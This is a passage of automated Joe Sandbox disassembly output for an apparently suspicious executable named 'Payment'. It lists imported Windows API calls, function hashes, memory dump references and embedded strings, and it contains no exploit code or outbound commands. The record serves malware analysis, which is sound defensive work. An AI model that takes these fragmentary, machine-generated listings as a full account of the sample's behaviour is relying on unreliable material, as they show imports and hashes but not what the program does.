                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B2C6D1
                                                          • MessageBeep.USER32(00000000), ref: 00B2C6E9
                                                          • KillTimer.USER32(?,0000040A), ref: 00B2C705
                                                          • EndDialog.USER32(?,00000001), ref: 00B2C71F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 96d60268398a8240a20bc2a7bc1cead3059c85e8e8d9443e688c564f7da7da4d
                                                          • Instruction ID: e04fe54385b9b36f1cc6438fbd3b20fc5bf8916098cd94a3cab54735d782d3ac
                                                          • Opcode Fuzzy Hash: 96d60268398a8240a20bc2a7bc1cead3059c85e8e8d9443e688c564f7da7da4d
                                                          • Instruction Fuzzy Hash: 8D01443050071597EB216B20ED9EFAABBB8FB04706F0005A9B546A24E1DBE06D54CE41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • EndPath.GDI32(?), ref: 00AD13BF
                                                          • StrokeAndFillPath.GDI32(?,?,00B0BAD8,00000000,?), ref: 00AD13DB
                                                          • SelectObject.GDI32(?,00000000), ref: 00AD13EE
                                                          • DeleteObject.GDI32 ref: 00AD1401
                                                          • StrokePath.GDI32(?), ref: 00AD141C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: 11b713ce674b601a923d577ddf124c863be0c4c6b56f538d8a190d5611f35092
                                                          • Instruction ID: f043b6418bd239bdafa9f7d8f6fe89dfa03c5d1b55710988b1a41286293e9754
                                                          • Opcode Fuzzy Hash: 11b713ce674b601a923d577ddf124c863be0c4c6b56f538d8a190d5611f35092
                                                          • Instruction Fuzzy Hash: A6F0E7B0004709EBDB155F26EE8CB687FA5AB11326F08C267E42A8A1F1CB318995DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 00B3C69D
                                                          • CoCreateInstance.OLE32(00B62D6C,00000000,00000001,00B62BDC,?), ref: 00B3C6B5
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                          • CoUninitialize.OLE32 ref: 00B3C922
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: e60409dd898ed95230ce7abe425c8b827d1705a7679cc5ed93fb71fb95abc980
                                                          • Instruction ID: e85b2d6d81893bdb4bb1850a310b14a054aec48e21aa6b3fbacf8e11498a88cf
                                                          • Opcode Fuzzy Hash: e60409dd898ed95230ce7abe425c8b827d1705a7679cc5ed93fb71fb95abc980
                                                          • Instruction Fuzzy Hash: F7A12D71104205AFD700EF64C981EAFB7E8FF98744F00495DF1569B2A2EB70EA49CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AF0FF6: std::exception::exception.LIBCMT ref: 00AF102C
                                                            • Part of subcall function 00AF0FF6: __CxxThrowException@8.LIBCMT ref: 00AF1041
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                            • Part of subcall function 00AD7BB1: _memmove.LIBCMT ref: 00AD7C0B
                                                          • __swprintf.LIBCMT ref: 00AE302D
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AE2EC6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: 71de4934bb969d2d447d1295cf1bd4b8128d9d65fe75553f5e5af02880f505b5
                                                          • Instruction ID: 6565177d1453cf89a660bb5f18a9bbc10078ba6d90f2fb4c93140082d84e1702
                                                          • Opcode Fuzzy Hash: 71de4934bb969d2d447d1295cf1bd4b8128d9d65fe75553f5e5af02880f505b5
                                                          • Instruction Fuzzy Hash: AD918F725083419FCB18EF24DA95C6EB7F8EF85740F40495EF482972A1EB20EE45CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AD48A1,?,?,00AD37C0,?), ref: 00AD48CE
                                                          • CoInitialize.OLE32(00000000), ref: 00B3BC26
                                                          • CoCreateInstance.OLE32(00B62D6C,00000000,00000001,00B62BDC,?), ref: 00B3BC3F
                                                          • CoUninitialize.OLE32 ref: 00B3BC5C
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: f205b33ad7563d6ccfabfbdd98bb3fb2a8725d8949fe90ee3567e77d19c28454
                                                          • Instruction ID: c4678cd9688d658014061feee0fdb2049c767fd223b1db8d485e08e87f5b15b2
                                                          • Opcode Fuzzy Hash: f205b33ad7563d6ccfabfbdd98bb3fb2a8725d8949fe90ee3567e77d19c28454
                                                          • Instruction Fuzzy Hash: E7A15275604301AFCB10EF14C584E6ABBE5FF88314F148999F99A9B3A1CB31ED45CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 00AF52DD
                                                            • Part of subcall function 00B00340: __87except.LIBCMT ref: 00B0037B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: 9691c4085bcbe1a2a34bfe8464a2a181868bdf02d7b9c5532fa016b2aaff7fb5
                                                          • Instruction ID: d4b55104e03db450407d32676ab854c536d92562dd8bf32c46cf5099b4456e41
                                                          • Opcode Fuzzy Hash: 9691c4085bcbe1a2a34bfe8464a2a181868bdf02d7b9c5532fa016b2aaff7fb5
                                                          • Instruction Fuzzy Hash: E4516A21E2DA0A87C7117778C9513BE2FE4EB00750F204A99F3D5862E9EF748CC49A4A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$+
                                                          • API String ID: 0-2552117581
                                                          • Opcode ID: d63134579d0818ec0da8555243181cc9fedf37e5001c5177264aa7a1835a7409
                                                          • Instruction ID: a4b3723b55e7097d5e930f3cc73cab288321245c0e96ad560510c37711b20896
                                                          • Opcode Fuzzy Hash: d63134579d0818ec0da8555243181cc9fedf37e5001c5177264aa7a1835a7409
                                                          • Instruction Fuzzy Hash: 7E51313550426ACFCF259F68D888EFE7BA4EF19310F1400A6F9959F2A1D7349C42CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: ERCP
                                                          • API String ID: 2532777613-1384759551
                                                          • Opcode ID: 60a2536a423983193db00c41c0d6ce3f7d4cbb0614f0ab77fd6b9ad91acc2e28
                                                          • Instruction ID: b19cae0a3891bb02f1cf4c8af736f4fa943a54a660d1b132eddcbda6ad9d3164
                                                          • Opcode Fuzzy Hash: 60a2536a423983193db00c41c0d6ce3f7d4cbb0614f0ab77fd6b9ad91acc2e28
                                                          • Instruction Fuzzy Hash: FA51E671900359DFCB24DF65C981BAABBF4EF14354F2089AEE54ADB281E771E590CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B5F910,00000000,?,?,?,?), ref: 00B57C4E
                                                          • GetWindowLongW.USER32 ref: 00B57C6B
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B57C7B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 9c615bf9067ee3d5cb63ba9ee21bf7dead52a5ea49f36c52a7f0c632d166b9eb
                                                          • Instruction ID: eb60bb98db6368c71c9f7f689d20b686fd3c34840b87be7699a2441148bb68c5
                                                          • Opcode Fuzzy Hash: 9c615bf9067ee3d5cb63ba9ee21bf7dead52a5ea49f36c52a7f0c632d166b9eb
                                                          • Instruction Fuzzy Hash: 4531BC31244206ABDB119F38EC45BEA77E9EF09325F2447A5FC76A32E0DB31E8549B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B576D0
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B576E4
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B57708
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: 5ac38e6e2af92afbfc82bd883e3b233225670ca7381dac186df780065b99e030
                                                          • Instruction ID: 16c61a142a66c633009913f75e2d02217ec5eced1d85f773eb2243a48f508c2a
                                                          • Opcode Fuzzy Hash: 5ac38e6e2af92afbfc82bd883e3b233225670ca7381dac186df780065b99e030
                                                          • Instruction Fuzzy Hash: D521A132650219BBDF11CFA4DC46FEA3BA9EF48724F110294FE156B1D0DAB1AC54CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B56FAA
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B56FBA
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B56FDF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 485c69c2d1f83e89c080bfe72b3e80d6d271c3f19391748c3cd1c55fc5ab6d42
                                                          • Instruction ID: 85b83bcc5b4e55c6dae8569356efefe0e1de9d163090a3130bdf51fe3c01a9bf
                                                          • Opcode Fuzzy Hash: 485c69c2d1f83e89c080bfe72b3e80d6d271c3f19391748c3cd1c55fc5ab6d42
                                                          • Instruction Fuzzy Hash: 8121C532A10218BFDF118F54DC85FBB37AAEF89751F4181A4F9149B1A0CA71AC55CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B579E1
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B579F6
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B57A03
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: aa8126cb7dafac871fd26b5608489af232bd6617e04ef6573d153699bb8ad16a
                                                          • Instruction ID: 22f8b74c764d2c5e04222edb5ef841efbb6e74ecb550deb39bc98839a21e35af
                                                          • Opcode Fuzzy Hash: aa8126cb7dafac871fd26b5608489af232bd6617e04ef6573d153699bb8ad16a
                                                          • Instruction Fuzzy Hash: 10110632294208BBEF109F70DC05FEB77E9EF89B65F010559FA41A60A0DB71E811CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AD4C2E), ref: 00AD4CA3
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AD4CB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: f59ea2ae86704f873d5ecf1778065d5fe07f44d1414d0e9e743f169e4c63b0c8
                                                          • Instruction ID: 8a2b1a48a912b86468fa9cbb1ec100abd6dbac93bf78c288aa2db9deb529c3d3
                                                          • Opcode Fuzzy Hash: f59ea2ae86704f873d5ecf1778065d5fe07f44d1414d0e9e743f169e4c63b0c8
                                                          • Instruction Fuzzy Hash: 06D01230510723CFD7205F31DA58716B6D5AF05752B1188BA9886D7260EA70D480CA51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AD4CE1,?), ref: 00AD4DA2
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AD4DB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: 9084abbcdd7f4c9e984e471d85e69ce1995171910efcf8dfdfb5b81ac240158c
                                                          • Instruction ID: a097b07602f31abfdb0e0b4ad7c3a96fcc1541c80d91d0519c06703d94ee3409
                                                          • Opcode Fuzzy Hash: 9084abbcdd7f4c9e984e471d85e69ce1995171910efcf8dfdfb5b81ac240158c
                                                          • Instruction Fuzzy Hash: F3D01731550B13CFE720AF31D808B56B6E5AF09356B2188BAD8D6E7260EB70D880CA50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00AD4D2E,?,00AD4F4F,?,00B962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AD4D6F
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AD4D81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: a9aad021cb92de3e93c4c7d740a5e211cc84eca36d0ef3054b48388ca2a77217
                                                          • Instruction ID: b5527cbd48008266e6a426b860c2e06856f450ed4f391b3099cf1ce9f6d9ef37
                                                          • Opcode Fuzzy Hash: a9aad021cb92de3e93c4c7d740a5e211cc84eca36d0ef3054b48388ca2a77217
                                                          • Instruction Fuzzy Hash: 74D01730510B13CFD720AF31D808766B6E9AF19352B2188BA98D7E7260EA70D880CA60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00B512C1), ref: 00B51080
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B51092
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: b9f178d36dfb6654d4b5323d6652244a0577cac94d0fcf0ffdfe64098c32df31
                                                          • Instruction ID: 730cf1bb682b5a68a950a7c7871cc257c9f7f7debbbf1bd7959b30c3b5934c03
                                                          • Opcode Fuzzy Hash: b9f178d36dfb6654d4b5323d6652244a0577cac94d0fcf0ffdfe64098c32df31
                                                          • Instruction Fuzzy Hash: C5D0EC31510713CFD7206F35D858B26B6E4EF05392B158CA9A885D71A0DB70C480CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B49009,?,00B5F910), ref: 00B49403
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B49415
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
